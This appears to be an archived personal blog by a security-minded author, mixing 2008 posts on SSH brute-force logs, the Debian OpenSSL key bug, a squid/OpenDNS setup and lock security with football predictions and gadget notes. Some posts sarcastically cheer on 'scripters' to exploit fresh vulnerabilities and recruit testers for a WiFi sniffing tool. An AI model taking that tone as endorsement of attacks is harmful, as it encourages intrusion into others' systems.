Matches: from:((@komplett.nl OR @4launch.nl OR @livinstyle.nl OR @marketing.rackspace.co.uk OR @youthink.com OR @sourceforge.net OR @klm-email.com OR @service.swiss.com OR @dienstmakkers.nl OR @amsterdam.nl OR @honestreporting.com OR @ziki.com OR @opendns.com OR @marketing.rackspace.co.uk OR @enews.sierra-news.com OR @rapidshare.com OR @weekly.gamespy.com OR @nts.nl OR @nintendo-europe.com OR @dienstmakkers.nl OR @ajax.nl @komplett.nl OR @bol.com OR @service.swiss.com OR @sans.org OR @videoland.nl OR @sovereignlife.com OR @amsterdam.nl OR @nts.nl OR @20min.ch OR @ringtonio.nl OR @2dehands.nl OR @4launch.nl OR @klm-email.com OR @davinciteam.com OR @mail.expedia.nl OR @looki.de OR @global-conflict.org OR @i3d.net OR @ebay.de OR @db2.myorc.com OR @mashmaker.intel.com OR @xing.com OR @firebrandtraining.co.uk OR @ipswitchmail.com OR @marktplaats.nl))
Do this: Skip Inbox, Apply label "XXX"

Nice. Inbox down to (243) unreads that I acually might read, one day... unless they're caught by my 'sorry, no time' filter that somehow flagged the message by triage as "dead wood".

Photo by Code Poet

Times are changing...

I am from the time that dental correction was only cool when done invisible. You would have your holes plugged, most of the time with 'amagaan' but that was for the poor [me]. The cooler people used plastic in teh colour of their teeth.

Nowadays my kids _die_ for a super visible dental correction. The more 'bling' the better.

A good thing, in my book.

SSH brute force botnet

Nice, I must have been a sleep the last couple of days. Since May 11 02:41:53 my logfiles [who never sleep] started logging a more 'advanced' brute force ssh attempts. See this:

May 11 02:41:53 meij sshd[23046]: Failed keyboard-interactive/pam for invalid user tomcat from 168.243.236.228 port 56131 ssh2
May 11 04:36:27 meij sshd[23490]: Failed keyboard-interactive/pam for invalid user tsc from 190.12.74.11 port 57240 ssh2
May 11 07:07:29 meij sshd[24482]: Failed keyboard-interactive/pam for invalid user chang from 66.159.198.155 port 51730 ssh2
May 11 19:41:47 meij sshd[27408]: Failed keyboard-interactive/pam for invalid user backup from 196.211.44.154 port 12491 ssh2
May 11 19:42:58 meij sshd[27411]: Failed keyboard-interactive/pam for invalid user backup from 193.224.140.35 port 57552 ssh2
May 11 21:09:33 meij sshd[27738]: Failed keyboard-interactive/pam for invalid user postgres from 66.159.198.155 port 59462 ssh2
May 12 01:37:24 meij sshd[29026]: Failed keyboard-interactive/pam for invalid user thomas from 193.224.140.35 port 57325 ssh2
May 12 02:40:33 meij sshd[29258]: Failed keyboard-interactive/pam for invalid user franky from 66.193.161.130 port 49501 ssh2
May 12 03:20:11 meij sshd[29421]: Failed keyboard-interactive/pam for invalid user majordomo from 66.159.198.155 port 49959 ssh2
May 12 03:40:57 meij sshd[29482]: Failed keyboard-interactive/pam for invalid user shop from 212.24.179.54 port 42187 ssh2
May 12 03:58:24 meij sshd[29541]: Failed keyboard-interactive/pam for invalid user thisuserdoesnotexists from 88.191.50.77 port 58021 ssh2
[... snip ...]
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from 66.162.98.185 port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from 66.122.59.6 port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from 74.238.169.202 port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 72.254.69.226 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 211.232.103.213 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 213.134.152.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 194.94.205.135 port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from 85.207.127.98 port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 213.134.152.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 74.238.205.245 port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from 69.15.172.22 port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from 62.2.211.46 port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from 217.7.233.155 port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 64.73.250.213 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 221.8.255.134 port 42398 ssh2
[end.]

1209 attempts for 654 "invalid users" in 49 busy hours from [
grep "invalid user" /var/log/messages | awk -F" " '{ print $13 }' | sort | uniq -u | wc] 53 unique addresses. Not bad. Slipped below my denyhosts radar just nicely.

Kampioen EK2008: Rusland

Today is speculation day :D

Zwitserland - Tsjechie 2 - 1
Roemenie - Frankrijk 0 - 2
Portugal - Turkije 1 - 1
Nederland - Italie 3 - 2
Tsjechie - Portugal 2 - 1
Italie - Roemenie 2 - 1
Zwitserland - Turkije 3 - 2
Nederland - Frankrijk 0 - 2
Zwitserland - Portugal 1 - 2
Nederland - Roemenie 2 - 1
Turkije - Tsjechie 0 - 0
Frankrijk - Italie 1 - 2

Oostenrijk - Kroatie 1 - 1
Spanje - Rusland 1 - 2
Duitsland - Polen 1 - 0
Griekenland - Zweden 1 - 3
Kroatie - Duitsland 1 - 2
Zweden - Spanje 0 - 2
Oostenrijk - Polen 3 - 1
Griekenland - Rusland 1 - 2
Polen - Kroatie 1 - 1
Griekenland - Spanje 0 - 2
Oostenrijk - Duitsland 3 - 4
Rusland - Zweden 2 - 1


Zwitserland - Oostenrijk 3 - 1
Duitsland - Tsjechie 2 - 0

Frankrijk - Spanje 3 - 1
Rusland - Italie 2 - 1


Zwitserland - Duitsland 3 - 1
Spanje - Rusland 0 - 1

Zwitserland - Rusland 2 - 3

Kampioen EK2008: Rusland

Speculation SSL Ubuntu & Thawte

Hmm, considering the fact that Mark Schuttleworth is the founder of both Thawte and Ubuntu...

And Ubuntu is Debian based

And Debian's SSL suffers from a giant randomness issue

And www.thawte.com runs on Ubuntu

And Ubuntu is a large Certificate Authority

Does that insinuate all Thawte certificates are ready for a review? :P

A great day for scripters!

Last months have been good for the security market. SPAM rose [it has been since 30 years but who is counting?], BOTNETS grew, CC snooping went bigger and the list was nicely added with two, well, astounding issues within the last 24 hours.

First we have a crypto nub who decides to remove basically all randomness [the seed used for PRNG (Pseudo Random Number Generator) used when creating SSL keys] from SSL in Debian. That did not happen last week, nor last month, not even last year, but on Tue May 2 16:34:53 2006 UTC. For reasons that have been mentioned over and over again, not security people should not, repeat NOT fiddle with security issues. Specially not packagers who just want things to install cleanly and silently. That bad.

In this case an unnamed individual did not like what he saw as uninitialized data, he removed one line:
MD_Update(&m,buf,j);
That was enough to make ALL SLL certificates [and thus too the SSH keys that are based on SSL] generated on these systems a randomness that is limited to 32.768 options [all possible PID's on UNIX... That sounds a lot to humans, to computers that is nothing and to crypto it is fcuk all. It is so small that all possible keys have been generated in about two hours for the 1024-bit DSA and 2048-bit RSA keys for x86. HD Moore used 31 Xeon cores clocked at 2.33Ghz to do this.

Luckily for the researchers, HD Moore of metasploit moved quickly and created the OpenSSL Debian toolset WITHIN 24 HOURS[!!!] to toy with the issue.

Thank you. Scripters of the world: unite and have a ball!

To bring the issues a little closer to your mom & pop [who hardly depend on SSH], Aviv Raff decided to post a real nice and nifty 0-day for IE. Scripters of the world, you know what to do.

This is a particular nasty one, not just because it affects about 60% of all browsers in the world but also because our friends in Redmond just pushed out their monthly 'updates' so it will take at least another month before a patch is available, let alone the time it takes for mom & pop to actually update their IE.

So life is good, money there is to be made for us security people. Or is it?

Beta testers wanted for FERRET

Last October David Maynor went to the the NASCAR truck series. Of course he brought his iPhone with and was shocked to see so many open WiFi networks:


So what do you do when you made the headlines with your Ferret & Hamster releases in August 2007? You port Ferret [hamster too? Maybe? Please?] to the iPhone.

Now they are looking for beta testers with open iPhones. Feel up to the challenge?

Check here!

Happy Birthday Ha'Aretz!

Never will I forget how we met, how the initial moments where, how deeply I was moved by you and how a profound impact you made on me and my live.

It was a coincidence, no really, it was. It was not as if my live was aimed at that particular event, not that was I was brought up to come to you, not that I had any known desire to experience you. It was purely coincidental that we met. Or was it? Was it not so that in my family your name was uttered in soft words of the highest respect? Was it not so that the 'coded' words my grant parents & parents whispered to each other, hidden for us kids, when saying goodby, where words that ended with something like '...Jerusalem'?

It does not matter. Fact is, that on December the 27th, in the year 1989 you welcomed me. Fact is that ever since that day there is no place on earth that has touched me deeper, felt better, shines brighter then you.

Happy birthday, state of Israel. May you and your inhabitants live, prosper & find the peace and integrity you deserve.

Maths is the music of reason

musician wakes from a terrible nightmare. In his dream he finds himself in a society where music education has been made mandatory. “We are helping our students become more competitive in an increasingly sound-filled world.” Educators, school systems, and the state are put in charge of this vital project. Studies are commissioned, committees are formed, and
decisions are made— all without the advice or participation of a single working musician or composer.
Since musicians are known to set down their ideas in the form of sheet music, these curious black dots and lines must constitute the “language of music.” It is imperative that students become fluent in this language if they are to attain any degree of musical competence; indeed, it
would be ludicrous to expect a child to sing a song or play an instrument without having a thorough grounding in music notation and theory. Playing and listening to music, let alone composing an original piece, are considered very advanced topics and are generally put off until college, and more often graduate school.

As for the primary and secondary schools, their mission is to train students to use this language— to jiggle symbols around according to a fixed set of rules: “Music class is where we take out our staff paper, our teacher puts some notes on the board, and we copy them or transpose them into a different key. We have to make sure to get the clefs and key signatures right, and our teacher is very picky about making sure we fill in our quarter-notes completely. One time we had a chromatic scale problem and I did it right, but the teacher gave me no credit because I had the stems pointing the wrong way.”

In their wisdom, educators soon realize that even very young children can be given this kind of musical instruction. In fact it is considered quite shameful if one’s third-grader hasn’t completely memorized his circle of fifths. “I’ll have to get my son a music tutor. He simply won’t apply himself to his music homework. He says it’s boring. He just sits there staring out the window, humming tunes to himself and making up silly songs.”

In the higher grades the pressure is really on. After all, the students must be prepared for the standardized tests and college admissions exams. Students must take courses in Scales and Modes, Meter, Harmony, and Counterpoint. “It’s a lot for them to learn, but later in college when they finally get to hear all this stuff, they’ll really appreciate all the work they did in high school.” Of course, not many students actually go on to concentrate in music, so only a few will ever get to hear the sounds that the black dots represent. Nevertheless, it is important that every member of society be able to recognize a modulation or a fugal passage, regardless of the fact that they will never hear one. “To tell you the truth, most students just aren’t very good at music.

They are bored in class, their skills are terrible, and their homework is barely legible. Most of them couldn’t care less about how important music is in today’s world; they just want to take the minimum number of music courses and be done with it. I guess there are just music people and non-music people. I had this one kid, though, man was she sensational! Her sheets were impeccable— every note in the right place, perfect calligraphy, sharps, flats, just beautiful. She’s going to make one hell of a musician someday.”


Waking up in a cold sweat, the musician realizes, gratefully, that it was all just
a crazy dream. “Of course!” he reassures himself, “No society would ever reduce such a beautiful and meaningful art form to something so mindless and trivial; no culture could be so cruel to its children as to deprive them of such a natural, satisfying means of human expression. How
absurd!”

Meanwhile, on the other side of town, a painter has just awakened from a similar
nightmare…

***********
And all this leads us into a wonderful written essay on how we are messing up the love and purity of math for our kids. Written by Paul Lockhart [and NO, that is NOT the space invader Paul Lockhart], an assistant professor at Brown Brown who left to teach a mathematician's point of view to very young children. In his own words, "I want them to understand that there is a playground in their minds and that that is where mathematics happens. So far I have met with tremendous enthusiasm among the parents and kids, less so among the mid-level administrators." Is that so :P

BTW If anybody speaks to Paul, can you please ask him to start blogging or publishing more in any other way shape or form?

An eye opener and good read to boot. Enjoy it!

HELP: Linkedin removed my profile! [well, not mine, really]

What gives? A colleague of mine ran into my office and asked me to check Linkedin to see if I could find his profile. We are connected so, sure, I checked my connections. Since I am known to make a spelling error or two, specially with names, I was not convinced that something was wrong when I did not find him in my connections list.



So I used Google, who loves LinkedIn profiles, to see if I got his name correct: I did.







As a matter of fact, Google nicely cached his profile page on LinkedIn. CCIE # et all. So for sure he nor me is not nuts and he did have a LinkedIn profile and we are connected. Something must be wrong with my seach on LinkedIn, right?

Let's copy & paste that name, and CCIE serial, and repeat the search.


No matter what we tried, all we found was this "Dell sales dude" but never the hardcore network'er that stood behind me, I had linked to, and Google had cached.






So I tried some Google-fu to see if more people had their profile removed by LinkedIn, but all I found was people who asked for them selfs to be removed and happy faces that LinkedIn finally let's you remove links to people you once linked to. Silently, to make sure you piss nobody off :P

This is an interesting issue however.

I always check peoples LinkedIn profiles when I do job interviews or have business meetings planned with people I do not know. It often helps to make sure you use the correct wording [or metaphor's when clueless] when you know a little bit about their [public] background. I know many future employers do the same [Hi guys! I see you browse my profile before you call :D].

But what happens if you can't find that potential new employee on LinkedIn and you know nothing about her|him? Will it influence your initial selection on who to talk to and who not? I am sure it does for lots of companies. Never mind how smart that is, but it is done.

So what do you do when you drop of the most valuable professional showroom of the net? How does one prevent that from happening and having a too big an impact on your money making abilities?

Imagion being Vodafony and bending over Apple...

What do you get after you've been initially big mouthing Steve at the launch of the iPhone, claiming you know it all for you have been in the GSM cloud business so long?

You get the left overs, the 2G countries, like: Australia, the Czech Republic, Egypt, Greece, Italy, India, Portugal, New Zealand, South Africa and Turkey. And those you get not even exclusively, muwaa!!!

Being able to offload 2G handsets into secondary markets will be very useful for Apple if they do launch a 3G version of the iPhone as generally expected.

Now, Arun Sarin has been labeled strange and basically clueless before. Being out of touch with reality really scares the shiit out of people working in his company but who know, now that he found the way in to Apple's $ stream, maybe the good people working at Vodafone will get a break and develop something nice. Maybe. Then again it is more likely the big shot sees no need for cool iPhone apps and will be happy with the pennies and cents he is allowed to keep for the devices he sells, business like usual.

opendns resolve issue? no, it's squid.

For reasons only known to my shrink, I wanted Firefox to use a tunnel from a Windows XP machine to a OpenSuse linux host resolving via OpenDNS and squid to make things complete.

Funny stuff, that I do just because I can.

It is all really easy to get it up and running, nice to have your own tools on a sticky and funnel your wild browsing behavior encrypted to a known end point where you set it free into the world wild web. But trust is good, a functional test is better, but checking is better, as my audit teacher taught me. So the first thing I did was monitoring for data leakage on my local [windows host's] interface: nada. Schade.

Then I went to the remote's host interface to see what showed there: horor, nice! What I saw was part of the resolve queries going to my old and reliable [and we all hate reliable, right?] colocate DNS and part of the queries to OpenDNS. Hmm, makes you wonder. So checking the resolve file showed that I had correctly added the two opendns entries, and correctly removed the entries passed to the file via DHCP. I flushed the DNS cache, still no joy. Hmm, makes you wonder. Turned out it was squid not nicely obeying the new entries in the resolver file. Naughty squid!

My setup in more detail:

Firefox [2.0.14 on winXP SP2] well, actually it is FireFoxPortable on a 16Gb Flash Voyager.
putty [version 0.60] for a tunnel to an external host, listening on 127.0.0.1:8888, talking to 127.0.0.1:3128 where squid [Version 2.5.STABLE10] on Suse [2.6.13-15.18 i386]

I have added a boolean option into the URL "about:config" page in Firefox named "network.proxy.socks_remote_dns" and set it to true.

The resolver file on the remote host contains:
cat /etc/resolve
### BEGIN INFO
# # Modified_by: dhcpcd
# Backup: /etc/resolv.conf.saved.by.dhcpcd.eth0
# Process: dhcpcd
# Process_id: 4326
# Script: /sbin/modify_resolvconf
# Saveto:
# Info: This is a temporary resolv.conf created by service dhcpcd.
# The previous file has been saved and will be restored later.
# # If you don't like your resolv.conf to be changed, you
# can set MODIFY_{RESOLV,NAMED}_CONF_DYNAMICALLY=no. This # variables are placed in /etc/sysconfig/network/config.
# # You can also configure service dhcpcd not to modify it.
# # If you don't like dhcpcd to change your nameserver # settings
# then either set DHCLIENT_MODIFY_RESOLV_CONF=no
# in /etc/sysconfig/network/dhcp, or
# set MODIFY_RESOLV_CONF_DYNAMICALLY=no in
# /etc/sysconfig/network/config or (manually) use dhcpcd
# with -R. If you only want to keep your searchlist, set
# DHCLIENT_KEEP_SEARCHLIST=yes in /etc/sysconfig/network/dhcp or
# (manually) use the -K option.
# ### END INFO
nameserver 208.67.222.222
nameserver 208.67.220.220

And yes, I have set both options to 'no'

To clear the dns 'cache' I used:
/etc/init.d/nscd restart

What puzzled me is the following output when I use my local browser [that tunnels it's requests to the remote host] and monitor the DNS queries on the remote host's interface [the remote host being my-host.xxx, my provider's dns server being lookup2.colo.xxx]:

tcpdump -p -i eth0 port 53

15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:19.739459 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 17259+ PTR? 81.240.202.213.in-addr.arpa. (45)
15:52:19.949697 IP resolver1.opendns.com.domain > my-host.xxx.39176: 17259 1/0/0 (67)
15:52:19.950334 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 48705+ PTR? 222.222.67.208.in-addr.arpa. (45)
15:52:19.973525 IP resolver1.opendns.com.domain > my-host.xxx.39176: 48705 1/0/0 (80)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
15:52:23.134089 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 57393 3/3/3 A youtube.com,[|domain]
15:52:23.134563 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 51875+ PTR? 253.153.65.208.in-addr.arpa. (45)
15:52:23.157911 IP resolver1.opendns.com.domain > my-host.xxx.39176: 51875 1/0/0 (70)
15:52:24.315674 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 48709+ A? twitter.com. (29)
15:52:24.502987 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 48709 1/5/5 A[|domain]
15:52:25.981131 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 25981+ A? www.google.com. (32)
15:52:25.981560 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 25981 5/7/7 CNAME www.l.google.com.,[|domain]
15:52:28.057148 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 20445+ A? www.google-analytics.com. (42)
15:52:28.057758 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 20445 5/7/7 CNAME[|domain]
15:52:29.280144 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 59181+ A? toolbarqueries.google.com. (43)
15:52:29.408904 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 59181 5/7/7[|domain]

Turned out that I had to restart squid [/etc/init.d/squid restart] to make the resolving act nicely and forward _all_ lookups to opendns.com

16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:08.624282 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 59333+ A? central.ujcfedweb.org. (39)
16:12:08.843032 IP resolver1.opendns.com.domain > my-host.xxx.39176: 59333 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
16:12:10.213033 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 18146+ PTR? 100.146.121.128.in-addr.arpa. (46)
16:12:10.236480 IP resolver1.opendns.com.domain > my-host.xxx.39177: 18146 NXDomain 0/0/0 (46)
16:12:12.703541 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 11197+ A? www.google.com. (32)
16:12:12.727000 IP resolver1.opendns.com.domain > my-host.xxx.39176: 11197 3/0/0 CNAME[|domain]
16:12:13.629888 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 24465+ A? www.justsayhi.com. (35)
16:12:13.738147 IP resolver1.opendns.com.domain > my-host.xxx.39176: 24465 1/0/0 A 4.78.241.72 (51)
16:12:13.738702 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 42572+ PTR? 72.241.78.4.in-addr.arpa. (42)
16:12:14.273047 IP resolver1.opendns.com.domain > my-host.xxx.39177: 42572 NXDomain 1/0/0 CNAME[|domain]
16:12:15.706642 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 54172+ A? www.google-analytics.com. (42)
16:12:15.730274 IP resolver1.opendns.com.domain > my-host.xxx.39176: 54172 5/0/0 CNAME[|domain]
16:12:18.673145 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 40629+ A? toolbarqueries.google.com. (43)
16:12:18.696662 IP resolver1.opendns.com.domain > my-host.xxx.39176: 40629 5/0/0[|domain]

Hope this helps someone trying to use opendns.com too.

Google ad's my Inbox(1) !!!

Here is a nice variation on misleading google ad's: claiming your Inbox has (1) unread email, smart move [thanks to Twitter, Twinkle & Jeroen Mirck for making this possible :P ].

I liked the people who used the ASCII adds last year, I do, I am inn the market for funny ads that make me wonder, think or just laugh.

Unfortunatly, ASCII art ad's are over since Google altered the 'puncuation' rule.

Maltego v2 - is ready!

Oh boy I am so exited!

Get it at: http://www.paterva.com/maltego/

All,

After 15 months of work Maltego version 2.0 is ready. It's been a long and interesting road. Many of you have seen the product grow from beta 1 to beta 2, then KZ3 and JS1. I've shared with you the challenges, the ups and downs. Finally, today, I am happy to release version 2.0.
Version 2.0 is commercial and I feel it's got the right be commercial because it's by far the coolest and most useful application I've ever used (OK so perhaps I am just slightly biased). As I've mentioned before - it goes live to this list first. Everything is set up, but not linked to the main site. I will link it on Monday.

Also - as promised - a list of new features/improvements:

* Load/Save of entire graphs means you can always go back to your investigation.
* Printing of graphs (over multiple pages)
* Export of entities (CSV format) makes it easy to import Maltego data into other databases.
* Commercial grade layout library:
o The layout and navigation have been optimized for speed and usability.
o Four layout types to rearrange data the way YOU want it.
o Two view types for finding relevant info on large graphs.
* More entities and 20 brand new transforms for even deeper searches and more information.
* Search/Find (on entity value, detailed info and additional fields) helps you to get to key nodes quicker.
* Multiple open graphs on different tabs for easy switching between graphs.
* Dedicated clear-all, zoom buttons for notebook users.
* Hollywood quality look & feel will impress your friends and your boss.
* Integrated help on transforms and entities to increase your learning curve.
* Complete user guide ensures you are never lost.
* Prepopulated and preconfigured transforms and transform sets saves you time.
* Population of API key integrated with license key so it’s never lost.
* Platform independent installer means you can install it anywhere.

If you want to see what it looks like before making a commitment you should look at the user guide and the screen shots. You should also read the system requirements.

The documentation can be found at http://ctas.paterva.com/wiki

Enjoy responsibly,
Roelof.

Avoiding speed traps, different

57 year old dude tries to avoid a speedtrap by applying the front break and sliding past below the radar:



Did not really work well. Broke his arm _and_ got a ticket.

Locks, SKG, the chalange

Whenever I move in to a new appartement, a new office building or take on the responsibility of other property that is secured by a cylinder lock, I exchange it.

The old cylinder and all it's associated keys will be documented and stored for later retrieval.

The new cylinder will be bought by me, at a store I trust and with a security certificate I like and I pay attention that _nothing_ that can identify me or my location gets associated with the certificate for I would not like to have to worry about the where abouts of that data since it is not under my control [the certificate can be used to remake a key without having a copy of the key].

So I pay by cash and have a second lock smith do the installation.

The appartment I moved in recently is a newly build complex. About a 1.000 appartments have been build by 45 different subcontracters who dig holes, lay pipes, pull wires, connect walls, paint doors and insert locks. For whatever it is worth: I do not trust them. The change that one of the workers copies the cuts of my particular key is just something that makes me feel uncomfortable.

Personally I know too little about the inner workings of locks to be able make a valid judgement about the grade of the lock, so I will buy only stff that does comply with the toughest international standards, including ISO 9001/2000, UL, CEN, VDS, SKG, CPC and A2P. Or when in Holland, the SKG [Stichting Kwaliteit Gevelbouw].

It is amazing to see that the price difference between a SKG ** and *** is rather low in comparison to the added features. One of the features I find a must have is the bump key proofing of locks. But all of this is just to prevent the damage free opening of the door.

Other measures need to be taken to prevent the more common 'crowbar style' and the 'Bulgarian' method [drilling]. A good resource of more information on the topic is The Open Organisation Of Lockpickers' that is credited with spreading the word on the issue in Holland, but even more important the concept behind high security lock design by Ross Kinard.

Googlology!

Never mind those old and dusty religions, for get the olt skool printed stuff, do not bother with the 10 rules, forget about diet stuff, reincarnation is of the past, after life is obsolete.

What rules now is Googlology. It's religion on steroids. No need for G*d in heaven, no need for spirits in the sky. Googlology designs and runs it's own heaven, and it's name is 'The Cloud'

The cloud will take care of your data, no matter where you need it, it will be there. The cloud will provide your services with more computing power then it needs, and the some. The cloud will harbour your applications, your email, your videostream, your rants, your pictures, your secrets and your dates, your world, your drawings, your finances, your money, and a whole lot more.

And I should know, since I drink all the Google Gulp from a hose.

But what if the cloud, errr, sort of not does what the EULA sort of makes you believe? What if the lawyer@TheCould p0wnzers you? And your data? What if, insert-your-personaly-favorite-upper-being-here, strikes back and lets some unknown entity take control over, well, you, basically?

How does one secure the absolute power of the cloud? There are some very smart people talking about it but lots of discussion is still about the definition, much less about the consequences, let alone what it actually means or how to do it.

Do you want to be the one who turns of the light now that everybody has left the old arena, or will you participate in shaping the future?

Replace your MAC harddisk, easy

I should do stuff more often, at least it makes far hotter stuff come out.

Couple of days ago I decided that both MAC laptops in the house needed more storage. The G4 PowerBook and the MacBook. So I ordered a Western Digital Scorpio 250GB 5400RPM and a Western Digital Scorpio 320GB 5400RPM. The replacement of the MacBook one can do with a sharp kitchen knife, no problem. Just remove the batery [do not bother shutting the OS down, it's as stable as my weight] and take a sharp kitchen knife [I used the new Global one I gave my wife a couple of days ago]. Unscrew 3 little screws, pull out the harddisk, take a strong plyer, remove the 4 screws, take the plastic thingy, wrap it on the new disk, sort of re attach the 4 screws, stick the thing back in. Ram the old battery in and of you go [never mind about the 3 little screws and the metal strip, all just surplus weight].

Reinstall and do not mind about the updates that want you to reboot your DVD version of the OS 4 times!

Now the Powerbook, that is another story. About 23 philips screws [tiny fuckers!] and then 2 torx 6, that is SIX, not 8, but 6, the smallest possible tool made only in Switzerland and it will set you back about the same amount of euroos as the 320Gb disk.

Then you get to pull of two, well, 'connectors' that are actually used open ended flatcables: class construction. Putting the whole thing back is a joy. Takes the precision of a live-bomb-defuser, nice enginering.

Installing the OS of course requieres the PPC version. Inserting the iMac Intel version yields a nice panic message. Never mind about the I-do-not-know-how-many updates and reboots [even for the so called 3.1.x SAFARY update one gets a reboot!], for they slow down the secure OS X anyway.

Right after finishing something flashy caught my eye: the MHZ2 CJ.

A 2.5 inch Serial-ATA Revision 2.6 (Gen1i and Gen2i) hard disk with embedded AES 256-bit hardware-based encryption, high-speed rotational speed of 7200rpm, it supports SATA 3.0Gbit/s and the capacities go up to 320GB with a 16MB buffer... How is that for cool?

You know what that means as soon as you see it: dumping the current disk for no reason on ebay, including all the private data it has accumelated in a months time and over pay for the new disk since it is new and hot.

Searching & Finding, part II

So there is Maltego, the coolest tool for finding information and there are machines that find lots of data. Of course Google uses some very smart alogrithims and Udi Manber really knows what he's talking about. On April 16, 2008 he answered the question "When I come to a Google in the future the context of my social network could be folded into the search?" with "I can imagine if you give us permission to do that, and we find that that’s useful for some queries. The question is, what percentage of queries and what kind of queries? When should you use it and when should you not use it?"

This had me completly baffeld. WHAT? I was saying to myself WHAT IS WRONG WITH THIS DUDE? I mean, after one look at the concept of Maltego I knew that that is the only way forward. Maybe he drank a little too much Google Gulp? Maybe he was trying to hide something since Google does not do pre-annoucements? Or maybe, he'd seen Maltego of Delver too and was just trying to surpress their market value so the goog's could snatch it up for little money in a little time?

"We have no intention of competing with the Googles of the world, because Google is doing a very good job of indexing the Web and bringing you the Wikipedia page of every search query you're looking for," says Liad Agmon, CEO of Delver. But we've been there, seen it, and even do it ourselfs now.

But that does not satisfy anymore. You know the procedure yourself: go to google.com, type a couple of keywords, check the first listing, alter the keywords [order even], check the listing and on and on. Most of the listings you get will be actively manipulated by crooks and link spammers.

So we need something else. As Anand Rajaraman puts it: if you have limited resources, add more data rather than fine-tuning the weights on your fancy machine-learning algorithm. Of course, you have to be judicious in your choice of the data to add to your data set. And this is exactly the point I am trying to drive home. More data sources [and some very decent post processing] enhances the results in amazing ways. [he works on his own SE too, called kosmix].

Some say, it is a terrible idea, like KublaiKhan. "This sort of searching will result in information from 'opposingsides' of controversies or arguments being deprecated, resulting inskewed information being available--because people tend to associatethemselves with other people of the same opinion."He goes on: "This new search engine will be wildly popular amongst thetype of person who enjoys violent flamewars, and will be useless forany person who wishes to consider both sides of a situation beforeforming an opinion... so it's going to be an enormous success and if I had the cash I'd invest in it. :-/"

Personally I would like to quote merreborn in reply to that remark:
"Sorry, I can't friend you, you'll screw up my search results"

Update:
Seems there is much much more going on and wrong between google and social websites...

Everything you ever wanted to know about the Enigma

As great a machine the Enigma was, it too could not prevent users from messing it up. Examples:

Part of the first class encryption of the Enigma was the possibility for the clerk to make up his own six-letter settings. This let to the Polish cryptanalysts occasionally being able to guess the settings. The military did not allow an obvious setting such as ABC. However, cipher clerks sometimes chose settings like QWE (the first three letters on the keyboard) or names. In the example above, if the first three letters were HIT, the cryptanalysts could guess that KOS and RLB were the ciphers to LER, spelling out HITLER. BER was usually followed by the ciphers of LIN. One particular German code clerk continually used his girlfriend’s name, Cillie, for his messages, and so these easy-to-guess indicators became known as "Cillies."

